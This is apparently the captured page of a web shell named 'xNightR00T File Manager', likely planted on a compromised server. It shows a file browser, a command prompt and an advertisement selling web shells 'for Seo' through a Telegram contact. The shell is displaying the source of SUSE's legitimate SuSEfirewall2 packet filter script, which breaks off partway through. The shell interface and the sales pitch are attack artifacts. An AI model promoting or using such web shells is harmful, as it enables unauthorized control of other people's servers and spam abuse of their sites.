xNightR00T File Manager

Current Directory:

	Name	Size	Permission	Modified	Actions
Loading...

$ Waiting for command...

__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleet

#!/bin/bash # # SuSEfirewall2 - stateful packetfilter rules generator # Copyright (C) 2000-2002 Marc Heuse <marc@suse.de> # Copyright (C) 2003,2004 SUSE Linux AG # Copyright (C) 2005-2011 SUSE LINUX Products GmbH # # Author: Marc Heuse # Maintainer: Ludwig Nussel # # Please send feedback via http://www.suse.de/feedback # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # version 2 as published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # For all those fellow experts out there: yes I know that this is NOT a # firewall setup but a simple (no, not simple, it tries actually to be # clever) packet filter. But if we would call this "SuSEpacketfilter", # only a few user would install it, hence general security would be bad. # ########################################################################### # # # The configuration file for this firewall script is # # /etc/sysconfig/SuSEfirewall2 # # # # Please make only modifications to this script if you know what you # # are doing! A small explanation of the setup can be found in # # /usr/share/doc/packages/SuSEfirewall2/README # # # # For new-user help concerning configuring this firewall, take a look at # # the configuration file /etc/sysconfig/SuSEfirewall2 - it tells # # you all # # (if not: sorry, but configuring a packet filter/screening router is NOT # # trivial - you must know what you are doing and what it actually does!) # # # ########################################################################### help() { cat <<EOF SuSEfirewall2 3.6, Copyright (C) 2005 SUSE LINUX Products GmbH stateful packet filter rules generator for iptables. $0 start|test|debug [file FILENAME] $0 basic|stop|close|status|help $0 open ZONE TYPE services... $0 on|off $0 [-s <service>] update-rpc Options: start generate and load the firewall filter rules from /etc/sysconfig/SuSEfirewall2 stop unload all filter rules close no incoming network traffic except bootp+ping (for boot security) basic set basic filter rules that drop all incoming access test generate and load the filter rules but do not drop any packet but log to syslog anything which *would* be denied status print the output of "iptables -nvL" debug print the iptables command to stdout instead of executing them log show SuSEfirewall2 related syslog messages in a better readable format help this output open open the specified services in the specified zone. You need to restart SuSEfirewall2 for changes to take effect. on add SuSEfirewall2 initscripts to boot process and start off remove SuSEfirwall2 initscripts from boot process and stop update-rpc update rules for dynamic RPC services if -s/--service is specified then only rules for the given service will be updated, otherwise for all configured RPC services file FILENAME same as "start" but load alternate config file FILENAME Calling $0 without any option is the same as the "start" option. The "file FILENAME" option may be used with the start, test and debug options. EOF exit 0 } removefiles=() declare -a removefiles removeonexit() { removefiles[${#removefiles[@]}]="$1" } cleanup() { local file for file in "${removefiles[@]}"; do rm -f "$file" done } trap cleanup EXIT quiet='' syslog() { local pri="-p auth.err" local dashs='-s' if [ "$1" = '0' ]; then pri="-p auth.info" if [ -n "$quiet" ]; then dashs='' fi elif [ "$1" = '-1' ]; then pri="-p auth.warn" fi shift /bin/logger $dashs $pri --id=$$ -t SuSEfirewall2 "$*" } message() { syslog 0 "$*" } warning() { syslog -1 "Warning:" "$*" } dbgmessage() { [ "$MODE" != "debug" ] && return message $* } tracemessage() { $TRACE || return message ${FUNCNAME[1]} $* } deprecated() { warning "$@ is deprecated and will likely be removed in the future." warning "If you think it should be kept please report your use case at" warning "https://features.opensuse.org/" } error() { syslog -2 "Error:" "$*" } die() { local ret=1 trap EXIT cleanup case "$1" in [0-9]) ret="$1"; shift ;; esac [ -n "$*" ] && syslog "$ret" "$*" exit $ret } need() { source_safe "$SCRIPTSDIR/SuSEfirewall2-$1" } set_defaults() { local dir file line var val for dir in "${DEFAULTSDIR[@]}"; do for file in "$dir"/*.cfg; do test -r "$file" || continue # we can't just source it as this would override config settings while read line; do [ "$line" = "${line#\#}" ] || continue var="${line%%=*}" [ "$var" = ${var//[^A-Za-z0-9]/_} ] || continue eval val=\"\$$var\" if [ -z "$val" ]; then eval "$line" fi done < "$file" done done } # sources the given file, but only if it has safe permissions and ownership function source_safe() { local file="$1" bits=`/usr/bin/stat -c %A "$file"` if [ $? -ne 0 ]; then echo "Cannot stat file $file to be sourced" 1>&2 return 1 fi owner=`/usr/bin/stat -c %u "$file"` group=`/usr/bin/stat -c %g "$file"` world_write_bit=${bits:8:1} if [ ${world_write_bit} != "-" -o "$owner" -ne 0 -o "$group" -ne 0 ]; then echo "Unsafe permissions for file $file to be sourced" 1>&2 return 1 fi . "$file" res=$? if [ $res -ne 0 ]; then echo "failed to source $file: returned $res" 1>&2 return 1 fi return 0 } function get_device_path() { local iface="$1" /usr/bin/readlink "/sys/class/net/$iface" } function match_device_path() { local iface="$1" local match="$2" link=`get_device_path $iface` if [[ "$link" == *"$match"* ]]; then return 0 fi return 1 } # gets a network device name as input and returns zero if it is a virtual # device like tap/tun/bond or a physical device, non-zero otherwise function is_virtual_device() { local iface="$1" match_device_path $iface "virtual" return $? } # like is_virtual_device() but checks whether the device is a removable, # hot-plugged device function is_hotplugged_device() { local iface="$1" # difficult to generically determine whether a network device is # removable, go for USB ... match_device_path $iface "usb" return $? } # takes a network device name as input and returns zero if we should ignore an # active bootlock for changes on this device, otherwise non-zero function allow_bootlock_ignore() { local iface="$1" # skip the loopback by default if [[ "$iface" = "lo" ]]; then return 1 fi # respect virtual or hotplugged evices if is_virtual_device "$iface" || is_hotplugged_device "$iface"; then return 0 fi # anything else has to wait until boot finish return 1 } CONFIGURATIONSDIR_0="/etc/sysconfig/SuSEfirewall2.d/services" CONFIGURATIONSDIR_1="/usr/share/SuSEfirewall2/services" DEFAULTSDIR=("/etc/sysconfig/SuSEfirewall2.d/defaults" "/usr/share/SuSEfirewall2/defaults") SCRIPTSDIR="/etc/sysconfig/scripts" FWCONFIG="/etc/sysconfig/SuSEfirewall2" LOCKFILE="/run/SuSEfirewall2.pid" BOOTLOCKFILE="/run/SuSEfirewall2.booting" STATUSDIR="/var/run/SuSEfirewall2" FW_CUSTOMRULES="" FW_ZONE_DEFAULT="" USE_IPTABLES_BATCH='' # whether ip6tables supports state matching IP6TABLES_HAVE_STATE=1 # whether ip6tables support REJECT IP6TABLES_HAVE_REJECT=1 ACTION="start" MODE="standard" TRACE=false INITSCRIPTS="" # on|off needconfig= needlock=1 create_bootlock=0 remove_bootlock=0 # prevent double log entries when called from ip-up if test -x /usr/bin/tty && ! /usr/bin/tty -s; then quiet=1 fi getopttmp=`/usr/bin/getopt -o hqi:s: --long help,scriptsdir:,batch,nobatch,file:,debug,trace,test,bootlock,bootunlock,quiet,interface:,service: \ -n 'SuSEfirewall2' -- "$@"` [ $? != 0 ] && die 1 "getopt error" eval set -- "$getopttmp" while true ; do case "$1" in --file) FWCONFIG="$2"; shift 2 ;; --batch) USE_IPTABLES_BATCH='yes'; shift ;; --nobatch) USE_IPTABLES_BATCH='no'; shift ;; --scriptsdir) SCRIPTSDIR="$2" ; shift 2 ;; --test) MODE="test" ; shift ;; --debug) MODE="debug"; needlock=0 ; shift ;; --trace) TRACE=true ; shift ;; --bootlock) create_bootlock=1 ; shift ;; --bootunlock) remove_bootlock=1 ; shift ;; -h|--help) help ; shift ;; -q|--quiet) quiet=1 ; shift ;; # only used by if-{up,down} scripts to indicate the interface # that changed -i|--interface) up_down_iface="$2"; shift 2 ;; # only used for update-rpc action -s|--service) rpc_service="$2"; shift 2 ;; --) shift ; break ;; *) die 1 "getopt error"; ;; esac done case "$1" in start|"") needconfig=1 ;; test) MODE="test" ;; debug) MODE="debug"; needlock=0 ;; easy|novice|basic) ACTION="basic" ;; stop|halt|down|shutdown) ACTION="stop"; needconfig=1 ;; close) ACTION="close" ;; status) ACTION="status"; USE_IPTABLES_BATCH='no'; needlock=0 ;; open) ACTION="open"; USE_IPTABLES_BATCH='no'; needlock=0 ;; log) ACTION="showlog"; USE_IPTABLES_BATCH='no' ;; bootlock) ACTION="bootlock"; create_bootlock=1; needlock=0 ;; bootunlock) ACTION="bootunlock"; remove_bootlock=1; needlock=0 ;; help) help ;; off) ACTION="stop"; needconfig=1; INITSCRIPTS="off" ;; on) ACTION="start"; needconfig=1; INITSCRIPTS="on" ;; boot_init) ACTION="init"; create_bootlock=1 ;; boot_setup) ACTION="start"; remove_bootlock=1 ;; systemd_stop) ACTION="$1"; needconfig=1 ;; update-rpc) ACTION="$1"; needconfig=1 ;; *) help ;; esac shift if [ "$ACTION" = "systemd_stop" ]; then # XXX: find a better way to check whether shutdown is in progress if systemctl --no-pager --full --all list-units | grep -q 'basic\.target.*active.*stop'; then die 0 "Not unloading firewall rules at system shutdown" else ACTION="stop" fi fi case "$ACTION" in start|stop) while [ $# -gt 0 ]; do case "$1" in file) FWCONFIG="$2"; shift 2 ;; force|batch) shift ;; # unused, for compatability *) echo "invalid option: $1"; exit 1 ;; esac done ;; esac test -e /etc/sysconfig/network/config && source_safe /etc/sysconfig/network/config source_safe $FWCONFIG if [ $? -ne 0 -a -n "$needconfig" ]; then die 6 " Can not read $FWCONFIG" fi if [ "$ACTION" = "init" ]; then if [ "$FW_BOOT_FULL_INIT" = 'yes' ]; then ACTION='start' else ACTION='close' fi fi set_defaults if [ -z "$USE_IPTABLES_BATCH" ]; then case "$FW_USE_IPTABLES_BATCH" in no) USE_IPTABLES_BATCH='' ;; yes) USE_IPTABLES_BATCH='yes' ;; ''|auto) USE_IPTABLES_BATCH='auto' ;; esac fi if [ "$FW_ZONE_DEFAULT" = 'yes' -o "$FW_ZONE_DEFAULT" = 'auto' ]; then FW_ZONE_DEFAULT='' fi if [ -n "$USE_IPTABLES_BATCH" -a "$USE_IPTABLES_BATCH" != 'no' ]; then need batch check_iptables_batch fi [ "$USE_IPTABLES_BATCH" = 'no' ] && USE_IPTABLES_BATCH='' ### Definitions - fixed unset ${!LC_*} ${!RC_LC_*} LANGUAGE RC_LANG export LANG=en_US export PATH="/sbin:/bin:/usr/sbin:/usr/bin" hwdesc2iface=/etc/sysconfig/network/scripts/hwdesc2iface modinfo="/sbin/modinfo" TC="/usr/sbin/tc" IPTABLES_BIN="/usr/sbin/iptables" IP6TABLES_BIN="/usr/sbin/ip6tables" if [ "$MODE" = debug ]; then IPTABLES="iptables" iptables() { echo iptables "$@" } IP6TABLES="ip6tables" ip6tables() { echo ip6tables "$@" } TC="tc" tc() { echo tc "$@" } modprobe() { echo modprobe "$@" } syslog() { echo "# <$1> ${*:2}" } ### ipv6 checks case "$FW_IPv6" in drop|reject) IP6TABLES_HAVE_STATE=0 ;; no) IP6TABLES=":" ;; *) FW_IPv6="" ;; esac else IPTABLES="$IPTABLES_BIN" IP6TABLES="$IP6TABLES_BIN" ### ipv6 checks case "$FW_IPv6" in drop|reject) IP6TABLES_HAVE_STATE=0 ;; no) IP6TABLES=":" ;; *) FW_IPv6="" ;; esac #### if [ -n "$USE_IPTABLES_BATCH" ]; then IPTABLES=iptables [ "$IP6TABLES" != ":" ] && IP6TABLES=ip6tables fi fi # list of the IPv4 and IPv6 tables commands to be used IPTABLES_LIST="$IPTABLES $IP6TABLES" ### jump targets ACCEPT="ACCEPT" DROP="DROP" REJECT="reject_func" [ "$FW_REJECT" = yes ] && DROP="reject_func" # fwmarks mark_redir=1 # ipsec ipsec_chain="" IPSEC_INPUT_MATCH="-m policy --dir in --pol ipsec --proto esp" IPSEC_OUTPUT_MATCH="-m policy --dir out --pol ipsec --proto esp" ### zones all_zones="int ext dmz" forward_zones= input_zones= #### constants safe_icmp_replies="echo-reply destination-unreachable time-exceeded parameter-problem timestamp-reply address-mask-reply protocol-unreachable redirect" safe_icmpv6_replies="echo-reply destination-unreachable packet-too-big time-exceeded parameter-problem" stateless_icmpv6_types="router-solicitation router-advertisement neighbour-solicitation neighbour-advertisement redirect 130" ############### check_ip6tables_support() { [ "$IP6TABLES" != ':' ] || return # Do we have a kernel with IPv6 enabled? if $IP6TABLES_BIN -nvL >/dev/null 2>&1; then if ! $IP6TABLES_BIN -m conntrack --help >/dev/null; then warning "ip6tables does not support state matching. Extended IPv6 support disabled." IP6TABLES_HAVE_STATE=0 # reject incoming packets if not specified otherwise [ "$FW_IPv6" != 'no' -a "$FW_IPv6" != 'drop' ] && FW_IPv6='reject' fi else IP6TABLES=: fi # assume kernel just supports this nowadays # $modinfo ip6t_REJECT >/dev/null 2>&1 || IP6TABLES_HAVE_REJECT=0 # if [ $ "$FW_REJECT" = "yes" -o "$FW_IPv6" = "reject" $ \ # -a "$IP6TABLES_HAVE_REJECT" != 1 ]; then # warning "Kernel lacks support for IPv6 REJECT target! Using DROP for IPv6 instead." # fi } is_running() { test -e /proc/net/ip_tables_names && $IPTABLES_BIN -nL reject_func >/dev/null 2>&1 } parse_logging() { if [ -z "$FW_LOG_LIMIT" ]; then FW_LOG_LIMIT="-m limit --limit 3/minute" elif [ "$FW_LOG_LIMIT" = 'no' ]; then FW_LOG_LIMIT='' else FW_LOG_LIMIT="-m limit --limit $FW_LOG_LIMIT" fi ### logging setup if [ -z "$FW_LOG" ]; then LOG='--log-level warning --log-tcp-options --log-ip-options --log-prefix SFW2' else LOG="$FW_LOG" fi case "$LOG" in -j\ *) ;; *) LOG="-j LOG $LOG" ;; esac LDC='' # log drop critical LDA='' # log drop all LDAC='' # log drop all or critical LAC='' # log accept critical LAA='' # log accept all LAAC='' # log accept all or critical # 'critical' will be unset if 'all' is set since 'critical' might be a special case of 'all'. if [ "$FW_LOG_DROP_ALL" != yes ]; then LDA=":" if [ "$FW_LOG_DROP_CRIT" = no ]; then LDC=":" LDAC=":" fi else LDC=':' fi if [ "$FW_LOG_ACCEPT_ALL" != yes ]; then LAA=":" if [ "$FW_LOG_ACCEPT_CRIT" != yes ]; then LAC=":" LAAC=":" fi else LAC=':' fi [ "$LAA" = ':' ] && LOG="$FW_LOG_LIMIT $LOG" } ### Functions # checks multiple sysctl.d config locations for configure values function is_in_any_sysctl() { local value="$1" if [ -z "$FW_SYSCTL_PATHS" ]; then # don't check all available sysctl.d directories for the # reason discussed in bnc#1044523 FW_SYSCTL_PATHS="/etc/sysctl.conf /etc/sysctl.d /usr/local/lib/sysctl.d" fi local path for path in $FW_SYSCTL_PATHS; do dbgmessage "Checking for sysctl value $value in path $path" if [ -d "$path" ]; then # expand to any config files found in the sysctl.d # style directory paths=$path/*.conf dbgmessage "Expanded $path to $paths" else paths=$path fi for file in $paths; do # check for existence, because the wildcard match # above might yield no matches, which would result in # error messages otherwise if [ -r "$file" ]; then dbgmessage "Checking in file $file" is_in_sysctl "$value" "$file" && sysctl_file="$file" && return 0 dbgmessage "no match" fi done done sysctl_file="" return 1 } # returns whether the given sysctl setting passed as $1 is found in the sysctl # style configuration file $2. # return code of 0 if a value was found, 1 if none was found function is_in_sysctl() { local path="$1" local sysctl="$2" # translate the proc path to a sysctl path syspath=`echo "$path" | /usr/bin/cut -d '/' -f 4- | /usr/bin/tr '/' '.'` grep -q "^[^#]*$syspath" $sysctl && return 0 # special case for the all / interface specific value in ipv4/conf/* # if we're about to change an interface specific value also check if # the global value is configured in sysctl in which case we shouldn't # touch the interface specific one, too syspath_all="`echo $syspath | /usr/bin/sed 's/ipv4\.conf\.[^\.]\+/ipv4\.conf\.all/'`" if [ "$syspath" != "$syspath_all" ]; then grep -q "^[^#]*$syspath_all" $sysctl && return 0 fi return 1 } # change value of a file in /proc/sys # $1: value to set the proc file to # $2: path of the file in proc function setproc() { local value="$1" local path="$2" [ -z "$path" -o ! -w "$path" ] && return is_in_any_sysctl $path && message "$path override in $sysctl_file, not setting it" && return if [ "$MODE" != "debug" ]; then echo "$value" > "$path" else echo "echo \"$value\" > \"$path\"" fi } # returns the correct iptables binary for the given IPv4/6 address function get_iptables() { local ip=$1 case "$ip" in *:*) echo $IP6TABLES;; # assume IPv4 for anything else *) echo $IPTABLES ;; esac } # parameters: protocol port variable # check whether $1 and $2/$3 are a valid protocol/port combination and sets global # variables $proto, $port ($rport) and $sport ($rsport) in iptables syntax # $4 is used for logging # returns 1 on error, the content of $proto and $port is undefined then check_proto_port() { proto="$1" port="$2" sport="$3" local var="$4" case "$proto" in '') if [ -z "$proto" -a -z "$port" -a -z "$sport" ]; then proto='' port='' rport='' sport='' rsport='' else error "proto must not be empty in ${var}" return 1 fi ;; _rpc_) # cannot check ports here ;; tcp|udp) if [ -n "$port" ]; then rport="--sport $port" port="--dport $port" else port='' rport='' fi if [ -n "$sport" ]; then rsport="--dport $sport" sport="--sport $sport" else sport='' rsport='' fi ;; icmp) if [ -n "$port" ]; then port="--icmp-type $port" rport="$port" else port='' rport='' fi if [ -n "$sport" ]; then sport="--icmp-type $sport" rsport="$sport" else sport='' rsport='' fi ;; icmpv6) if [ -n "$port" ]; then port="--icmpv6-type $port" rport="$port" else port='' rport='' fi if [ -n "$sport" ]; then sport="--icmpv6-type $sport" rsport="$sport" else sport='' rsport='' fi ;; *) if [ -n "$port" ]; then error "port is only valid with tcp, udp or icmp in ${var}" return 1 fi ;; esac [ -z "$proto" ] || proto="-p $proto" return 0 } reset_rules() { local policy_input policy_output policy_forward policy_input=${1:-ACCEPT} policy_output=${2:-ACCEPT} policy_forward=${3:-ACCEPT} $IPTABLES -P INPUT $policy_input $IPTABLES -P OUTPUT $policy_output $IPTABLES -P FORWARD $policy_forward # yes we need cat for /proc local names if [ -r /proc/net/ip_tables_names ]; then names=`sort < /proc/net/ip_tables_names` else names="filter nat raw" fi for i in $names; do $IPTABLES -t $i -F $IPTABLES -t $i -X done if [ "$IP6TABLES" != ":" ]; then $IP6TABLES -P INPUT $policy_input $IP6TABLES -P OUTPUT $policy_output $IP6TABLES -P FORWARD $policy_forward if [ -r /proc/net/ip6_tables_names ]; then names=`sort < /proc/net/ip6_tables_names` else names="filter nat raw" fi for i in $names; do $IP6TABLES -t $i -F $IP6TABLES -t $i -X done fi } clear_qdisc_settings() { local data local dev local bandwidth for data in $FW_HTB_TUNE_DEV; do IFS="," read dev bandwidth < <(echo "$data") $TC qdisc del dev $dev root 2> /dev/null done } function load_modules() { local i for i in "$@"; do modprobe "$i" done } function rulelog() { local chain="$1" if [ "$chain" != "${chain#input_}" ]; then chain="IN${chain#input_}" else chain="FWD${chain#forward_}" fi # cut off too long strings (bnc#644527) echo "${chain:0:11}" } function allow_basic_established() { # needed for dhcp and dns replies local iptables for iptables in "$IPTABLES" "$IP6TABLES"; do $LAA $iptables -A INPUT ${LOG}"-IN-ACC-EST " -m conntrack --ctstate ESTABLISHED $iptables -A INPUT -j "$ACCEPT" -m conntrack --ctstate ESTABLISHED # if two hosts have a tcp connection on fixed ports and # one of the hosts crashes it will send a SYN to the # peer if it comes back up. The peer sends back ACK as # it thinks there is already a connection established. # This ACK is INVALID and must be answered with RST # otherwise long timeouts may occur (#46818). # $LDA $iptables -A INPUT ${LOG}"-IN-REJECT-ACK " -m conntrack --ctstate INVALID -p tcp --tcp-flags SYN,RST,ACK ACK # $iptables -A INPUT -j "$REJECT" -m conntrack --ctstate INVALID -p tcp --tcp-flags SYN,RST,ACK ACK done # need to accept icmp RELATED packets (bnc#382004) $LAA $IPTABLES -A INPUT ${LOG}"-IN-ACC-REL " -p icmp -m conntrack --ctstate RELATED $IPTABLES -A INPUT -j "$ACCEPT" -p icmp -m conntrack --ctstate RELATED $LAA $IP6TABLES -A INPUT ${LOG}"-IN-ACC-REL " -p icmpv6 -m conntrack --ctstate RELATED $IP6TABLES -A INPUT -j "$ACCEPT" -p icmpv6 -m conntrack --ctstate RELATED } have_bridgeinterfaces() { local i for i in /sys/class/net/*/bridge; do [ -e "$i" ] && return 0 done return 1 } allow_bridgetraffic() { local iptables case "$FW_FORWARD_ALLOW_BRIDGING" in yes) ;; no) return ;; auto|'') have_bridgeinterfaces || return ;; esac for iptables in "$IPTABLES" "$IP6TABLES"; do $iptables -A FORWARD -m physdev --physdev-is-bridged -j ACCEPT done } xen_forward_hack() { local dev iptables if [ -n "$FW_FORWARD_ALWAYS_INOUT_DEV" ]; then warning "FW_FORWARD_ALWAYS_INOUT_DEV is deprecated and most likely not needed at all anymore" fi for iptables in "$IPTABLES" "$IP6TABLES"; do for dev in $FW_FORWARD_ALWAYS_INOUT_DEV; do $iptables -A FORWARD -i $dev -o $dev -j ACCEPT done done } # some rules for easier "out of the box" functionality function set_ootb_rules() { # mdns for avahi & friends. When a user uses a dsl router to connect # to the internet, he only has one interface and no zones. for IPT in $IPTABLES_LIST; do $IPT -A INPUT -p udp --dport mdns -m pkttype --pkt-type multicast -j "ACCEPT" done } function set_basic_rules() { local itype check_ip6tables_support load_modules ip_tables ip_conntrack $FW_LOAD_MODULES if [ "$IP6TABLES" != ':' ]; then load_modules ip6table_filter ip6table_mangle fi # determine policy local DROP_JUMP if [ "$DROP" = "ACCEPT" ]; then DROP_JUMP="ACCEPT" else DROP_JUMP="DROP" fi reset_rules "$DROP_JUMP" ACCEPT "$DROP_JUMP" # loopback is always allowed for iptables in "$IPTABLES" "$IP6TABLES"; do $iptables -A INPUT -j "$ACCEPT" -i lo $iptables -A OUTPUT -j "$ACCEPT" -o lo if [ "$FW_LO_NOTRACK" = 'yes' ]; then $iptables -t raw -A PREROUTING -j CT --notrack -i lo $iptables -t raw -A OUTPUT -j CT --notrack -o lo fi done # Special REJECT function # $IPTABLES -N reject_func $IPTABLES -A reject_func -p tcp -j REJECT --reject-with tcp-reset $IPTABLES -A reject_func -p udp -j REJECT --reject-with icmp-port-unreachable $IPTABLES -A reject_func -j REJECT --reject-with icmp-proto-unreachable $IP6TABLES -N reject_func if [ "$IP6TABLES_HAVE_REJECT" = 1 ]; then $IP6TABLES -A reject_func -p tcp -j REJECT --reject-with tcp-reset $IP6TABLES -A reject_func -p udp -j REJECT --reject-with port-unreach $IP6TABLES -A reject_func -j REJECT --reject-with addr-unreach # know anything better? fi # sometimes the above lines do not work despite prior checks, so add drop # always to be on the safe side $IP6TABLES -A reject_func -j DROP allow_bridgetraffic xen_forward_hack # workaround for ip6tables without state matching if [ "$IP6TABLES_HAVE_STATE" != 1 ]; then for itype in $stateless_icmpv6_types $safe_icmpv6_replies; do $LAA $IP6TABLES -A INPUT ${LOG}"-IN-ACC-ICMP " -p icmpv6 --icmpv6-type $itype $IP6TABLES -A INPUT -j "$ACCEPT" -p icmpv6 --icmpv6-type $itype done if [ "$FW_ALLOW_PING_FW" != no ]; then $LAA $IP6TABLES -A INPUT ${LOG}"-`rulelog $chain`-ACC-PING " -p icmpv6 --icmpv6-type echo-request $IP6TABLES -A INPUT -j "$ACCEPT" -p icmpv6 --icmpv6-type echo-request fi $LAA $IP6TABLES -A INPUT -p tcp --tcp-flags ACK ACK ${LOG}"-IN-ACC-TCP " $IP6TABLES -A INPUT -p tcp --tcp-flags ACK ACK -j "$ACCEPT" # Drop all until IPv6 is really supported $LDA $IP6TABLES -A INPUT ${LOG}"-IN-IPv6_PROHIB " if [ "$FW_IPv6" = "drop" -o "$IP6TABLES_HAVE_REJECT" != 1 ]; then $IP6TABLES -A INPUT -j "$DROP" else $IP6TABLES -A INPUT -j "$REJECT" fi $IP6TABLES -A OUTPUT -p icmpv6 -j "$ACCEPT" $IP6TABLES -A OUTPUT -p tcp -j "$ACCEPT" if [ "$IP6TABLES_HAVE_REJECT" != 1 -o "$FW_IPv6_REJECT_OUTGOING" = "no" ]; then $IP6TABLES -A OUTPUT -j "$DROP" else $IP6TABLES -A OUTPUT -j "$REJECT" fi IP6TABLES=":" # disable further rules fi allow_basic_established # Allow DHCPv6 by default. While the requests go out to multicast address, they # can come back from unicast hosts and we might not know them. $LAA $IP6TABLES -A INPUT -p udp --dport dhcpv6-client ${LOG}"-IN-DHCPv6 " $IP6TABLES -A INPUT -p udp --dport dhcpv6-client -j "$ACCEPT" if [ "$FW_CONFIGURED" != true ]; then # we might allow some more input in case no zones have been defined, # which is the default case for many desktop computers ... set_ootb_rules fi # make sure basic rules get committed even if there are errors later [ -n "$USE_IPTABLES_BATCH" ] && iptables_batch_commitpoint } handle_initscripts() { local i case "$INITSCRIPTS" in on) for i in SuSEfirewall2_init SuSEfirewall2; do /bin/systemctl enable $i.service done ;; off) for i in SuSEfirewall2 SuSEfirewall2_init; do /bin/systemctl disable $i.service done ;; esac } setlock() { if [ "$remove_bootlock" -ne 0 ]; then rm -f "$BOOTLOCKFILE" fi ### Locking mechanism if [ "$needlock" -ne 0 ]; then if [ -e "$BOOTLOCKFILE" ] ; then # ignore the bootlock, which is only a performance shortcut, in # case a virtual or hotplugged interface has just been configured # (bsc#785299) if [ -z "$up_down_iface" ] || ! allow_bootlock_ignore "$up_down_iface"; then die 0 "$BOOTLOCKFILE exists which means system boot in progress, exit." fi fi if [ -e "$LOCKFILE" ]; then read PID < $LOCKFILE message "Another SuSEfirewall2 with PID $PID found, waiting ..." i=0 while [ -e "$LOCKFILE" -a "$i" -lt 15 ]; do sleep 2 i=$(( i + 1 )) done if [ -e "$LOCKFILE" ]; then message "Lockfile is still there, ignoring it ..." kill -TERM $PID sleep 2 kill -KILL $PID rm -f "$LOCKFILE" fi fi removeonexit "$LOCKFILE" set -o noclobber echo "$$" > $LOCKFILE || exit 1 set +o noclobber fi if [ "$create_bootlock" -eq 1 ]; then touch "$BOOTLOCKFILE" fi } ## ## function definitions for full featured mode ## # Provide empty functions for transparent hook support for customised rules fw_custom_after_chain_creation() { true; } fw_custom_before_antispoofing() { true; } fw_custom_after_antispoofing() { true; } fw_custom_before_port_handling() { true; } fw_custom_before_masq() { true; } fw_custom_before_denyall() { true; } fw_custom_after_finished() { true; } evaluateinterfaces() { local devs="" local var dev local zone="$1" var="FW_DEV_`cibiz $zone`" eval set -- \$$var for dev in "$@" ; do if [ "$dev" = 'any' ]; then if [ -n "$FW_ZONE_DEFAULT" ]; then error "zone '$FW_ZONE_DEFAULT' is already default, ignoring 'any' in '$var'" else FW_ZONE_DEFAULT="$zone" fi continue elif [ "$dev" = 'auto' ]; then warning "ignoring deprecated interface 'auto' in $var" continue fi case "$dev" in *:*) continue; ;; esac devs="$devs $dev" done set -- $devs eval FW_DEV_$zone="\$*" } #sets iface_$name=$zone check_interfaces_unique() { local zone devs d z for zone in $all_zones; do eval devs="\$FW_DEV_$zone" for d in $devs; do [ -z "$d" ] && continue d=${d//[^A-Za-z0-9]/_} eval z=\${iface_$d} if [ -z "$z" ]; then eval iface_$d=$zone else error "$d already in zone '$z' but also configured for '$zone'" fi done done } source_config_for_iface() { local iface="$1" local dir=/etc/sysconfig/network if [ -x /sbin/getcfg ] ; then eval `/sbin/getcfg -d $dir -f ifcfg- -- $iface 2>/dev/null` cfg="$HWD_CONFIG_0" fi if [ -z "$cfg" ]; then cfg=$iface fi source_safe $dir/ifcfg-$cfg 2>/dev/null } check_iface_override() { local iface="$1" local f="$STATUSDIR/override/interfaces/$iface/zone" local z dummy test -e "$f" || return 0 read z dummy < "$f" || return 0 echo "$z" } autodetect_interfaces() { local d z local have_override='' [ "${FW_AUTODETECT_INTERFACES:-yes}" = 'yes' ] || return set -- /sys/class/net/* for d in "$@"; do test -d "$d" || continue d="${d#/sys/class/net/}" [ -z "$d" -o "$d" = 'lo' -o "$d" = 'sit0' ] && continue d=${d//[^A-Za-z0-9]/_} unset z if [ "$FW_RUNTIME_OVERRIDE" != 'no' ]; then z=`check_iface_override $d` if [ -n "$z" ]; then eval iface_$d=$z if eval [ -n "\"\$zone_$z\"" ]; then message "runtime zone override '$z' for interface '$d'" have_override=1 continue else error "invalid zone '$z' as override for interface '$d'" fi fi fi eval z=\${iface_$d} [ -n "$z" ] && continue eval [ -n "\"\$seen_$d\"" ] && continue eval local seen_$d=1 z=`source_config_for_iface $d && echo $FW_ZONE` if [ -n "$z" ]; then if eval [ -n "\"\$zone_$z\"" ]; then eval FW_DEV_$z="\"\$FW_DEV_$z \$d\"" #" fix vim syntax eval iface_$d=$z else error "invalid zone '$z' specified for interface '$d'" fi elif [ -n "$FW_ZONE_DEFAULT" -a "$FW_ZONE_DEFAULT" != 'no' ]; then z=${FW_ZONE_DEFAULT//[^A-Za-z0-9]/_} message "using default zone '$z' for interface $d" eval FW_DEV_$z="\"\$FW_DEV_$z \$d\"" #" fix vim syntax eval iface_$d=$z else warning "no firewall zone defined for interface $d" fi done # runtime override, we have to reconstruct FW_DEV_* if [ -n "$have_override" ]; then for z in $all_zones; do eval "FW_DEV_$z=''" done for d in ${!iface_*}; do eval z="\$$d" eval "FW_DEV_$z=\"\$FW_DEV_$z ${d#iface_}\"" done fi } write_interface_status() { local d z mkdir -p "$STATUSDIR"/status/interfaces for d in "$STATUSDIR/status/interfaces/"*; do d=${d##*/} [ "$d" != '*' ] || break d=${d//[^A-Za-z0-9]/_} eval z="\$iface_$d" if [ -z "$z" ]; then rm -rf "$STATUSDIR/status/interfaces/$d" else eval local seen_$d=1 echo $z > "$STATUSDIR/status/interfaces/$d/.zone.new" mv "$STATUSDIR/status/interfaces/$d/.zone.new" "$STATUSDIR/status/interfaces/$d/zone" fi done for d in ${!iface_*}; do eval z="\$$d" d=${d#iface_} eval [ -n "\"\$seen_$d\"" ] && continue mkdir "$STATUSDIR/status/interfaces/$d" echo $z > "$STATUSDIR/status/interfaces/$d/.zone.new" mv "$STATUSDIR/status/interfaces/$d/.zone.new" "$STATUSDIR/status/interfaces/$d/zone" done } write_zone_status() { local v z mkdir -p "$STATUSDIR/status/zones" for z 